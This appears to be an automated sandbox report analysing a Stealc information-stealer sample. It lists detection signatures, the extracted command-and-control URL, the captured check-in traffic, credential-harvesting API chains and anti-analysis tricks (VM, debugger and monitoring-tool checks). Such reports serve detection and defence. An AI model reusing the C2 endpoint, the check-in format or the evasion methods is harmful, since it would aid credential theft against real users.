Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1520640
MD5:fe0680dfa4a95f3c9f5efe7b68bebdc8
SHA1:e9bc2c7b21daeb95a9d77aa34afc1476648b573f
SHA256:aeb0218c5ae46c5d264100339920bca9c56a8f83b0a37383dbea2e33683d35d8
Tags:exeMarsStealeruser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6952 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FE0680DFA4A95F3C9F5EFE7B68BEBDC8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1367522794.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1326837199.0000000004DF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6952JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6952JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.ca0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-27T17:41:16.620266+020020442431Malware Command and Control Activity Detected192.168.2.749705185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.ca0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 47%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00CAC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00CA9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00CA7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00CA9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00CB8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00CB38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CB4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00CADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00CAE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00CB4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00CAED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CA16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00CB3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CAF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CAF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00CABE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00CADE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49705 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 30 44 33 35 30 41 33 30 31 44 33 36 36 33 38 31 32 31 38 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 2d 2d 0d 0a Data Ascii: ------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="hwid"4B0D350A301D3663812181------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="build"save------BFCFBKKKFHCFHJKFIIEH--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00CA4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCFBKKKFHCFHJKFIIEHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 30 44 33 35 30 41 33 30 31 44 33 36 36 33 38 31 32 31 38 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 42 46 43 46 42 4b 4b 4b 46 48 43 46 48 4a 4b 46 49 49 45 48 2d 2d 0d 0a Data Ascii: ------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="hwid"4B0D350A301D3663812181------BFCFBKKKFHCFHJKFIIEHContent-Disposition: form-data; name="build"save------BFCFBKKKFHCFHJKFIIEH--
                Source: file.exe, 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1367337890.0000000000A03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37//%
                Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/:%
                Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php0
                Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php?
                Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpg
                Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpktop
                Source: file.exe, 00000000.00000002.1367337890.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1367337890.00000000009BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37Wi

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D0_2_0106E96D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107417D0_2_0107417D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010268A40_2_010268A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010753A20_2_010753A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE523A0_2_00FE523A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010283F50_2_010283F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01070AD70_2_01070AD7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107252B0_2_0107252B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011885610_2_01188561
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106CDA50_2_0106CDA5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01055DE10_2_01055DE1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010A775F0_2_010A775F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01096E2B0_2_01096E2B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115463A0_2_0115463A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F24F5E0_2_00F24F5E
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00CA45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: vpiveclu ZLIB complexity 0.9948866430841404
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00CB8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00CB3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\A6GWCLAY.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 47%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1847808 > 1048576
                Source: file.exeStatic PE information: Raw size of vpiveclu is bigger than: 0x100000 < 0x19d000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ca0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;vpiveclu:EW;abjcrpar:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;vpiveclu:EW;abjcrpar:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00CB9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c75ac should be: 0x1c75a5
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: vpiveclu
                Source: file.exeStatic PE information: section name: abjcrpar
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0115B91E push esi; mov dword ptr [esp], ebx0_2_0115B939
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F340FE push ecx; mov dword ptr [esp], edi0_2_00F34151
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F340FE push edi; mov dword ptr [esp], eax0_2_00F341A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F340FE push ebp; mov dword ptr [esp], 7BED5B1Bh0_2_00F341A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010FD143 push ecx; mov dword ptr [esp], esp0_2_010FD1A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0113F141 push 5DA81FF7h; mov dword ptr [esp], edx0_2_0113F1EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0117D948 push esi; mov dword ptr [esp], edi0_2_0117DAA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push eax; mov dword ptr [esp], esp0_2_0106E9A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push esi; mov dword ptr [esp], ebp0_2_0106E9BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push esi; mov dword ptr [esp], ebp0_2_0106E9CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push ecx; mov dword ptr [esp], esi0_2_0106E9DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push 4D2A876Ah; mov dword ptr [esp], ebp0_2_0106EA20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push edx; mov dword ptr [esp], edi0_2_0106EAA4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push ebp; mov dword ptr [esp], ecx0_2_0106EAB4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push 496D4BC9h; mov dword ptr [esp], eax0_2_0106EB29
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push ebx; mov dword ptr [esp], edx0_2_0106EB4B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push edi; mov dword ptr [esp], eax0_2_0106EBDB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push ebx; mov dword ptr [esp], eax0_2_0106EBF7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push eax; mov dword ptr [esp], esi0_2_0106EC5A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push ebp; mov dword ptr [esp], edi0_2_0106ECB5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push 743B2B31h; mov dword ptr [esp], eax0_2_0106ECDA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push ecx; mov dword ptr [esp], ebp0_2_0106ECF2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push ebx; mov dword ptr [esp], edx0_2_0106ED28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push 5A14BEC4h; mov dword ptr [esp], ebx0_2_0106ED3E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push edx; mov dword ptr [esp], eax0_2_0106ED6F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push ecx; mov dword ptr [esp], 7CE9A9ECh0_2_0106EDAA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push edx; mov dword ptr [esp], 27AD0CD3h0_2_0106EE60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push edi; mov dword ptr [esp], 2AFC5582h0_2_0106EE9E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push 6F73E868h; mov dword ptr [esp], ebp0_2_0106EEAD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push edx; mov dword ptr [esp], ebx0_2_0106EF9E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106E96D push edi; mov dword ptr [esp], 57B55081h0_2_0106EFF1
                Source: file.exeStatic PE information: section name: vpiveclu entropy: 7.954457957368027

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00CB9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13720
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F021B5 second address: F021CB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F86385196DCh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C277 second address: 107C27D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C27D second address: 107C2AB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F86385196D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F86385196E0h 0x00000014 jmp 00007F86385196DFh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C2AB second address: 107C2BF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F863914EA26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F863914EA2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107C2BF second address: 107C2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076990 second address: 10769AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F863914EA37h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10769AC second address: 10769C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F86385196DAh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
